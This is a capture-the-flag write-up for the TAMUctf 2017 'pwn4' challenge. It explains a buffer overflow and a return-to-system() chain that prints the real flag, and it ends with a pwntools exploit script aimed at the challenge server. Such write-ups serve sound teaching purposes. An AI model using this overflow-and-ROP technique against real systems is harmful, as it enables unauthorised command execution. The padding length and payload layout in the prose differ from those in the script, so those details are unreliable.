intrd has spoken
nc web.ctf.tamu.edu 4324
I didn't like echoing inputs anyways.
(You do not need to get a shell to get the flag)
Solution
This one was fun.. again you can start by triggering a buffer overflow w/ 11 bytes of junk
..and you have a flag_func() which prints the flag
if you try the obvious.. rewrite the return pointer to it. And it works!
But when u try to retrieve the flag remotely you discover that you've been trolled :)
Ok, let's take a look a little more at the program..
Disassembling the flag_func() we can see that the program is reading the contents of the file flag2.txt and cat'ing for us:
Did you really think it would be that easy?
What we need is the flag.txt content. There's some tricks to remove this 2 and cat the right flag file, but..
..already there's a string allocated on memory w/ /bin/cat flag.txt
So, what our exploit need to do is a basic ROP:
- return to
flag_func() - force the program to push
0x0804a028into memory,/bin/cat flag.txtthe correct cat string. - passing this string to
system()located @0x080484d9
Exploit layout
OVERFLOW + flag_func_ADDRESS + STRING_ADDRESS + SYSTEM_ADDRESS
Final remote exploit
| ## Solution for TAMUctf 2017 : pwn200-pwn4 | |
| # @author intrd - http://dann.com.br/ | |
| # @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
| from pwn import * | |
| r = remote('web.ctf.tamu.edu', 4324) | |
| elf = ELF('./pwn4') | |
| payload = "A"*16 | |
| payload += p32(0x80484d9) #system | |
| payload += p32(0x804a028) #/bin/cat flag.txt | |
| payload += "AAAA" | |
| r.sendline(payload) | |
| r.interactive() |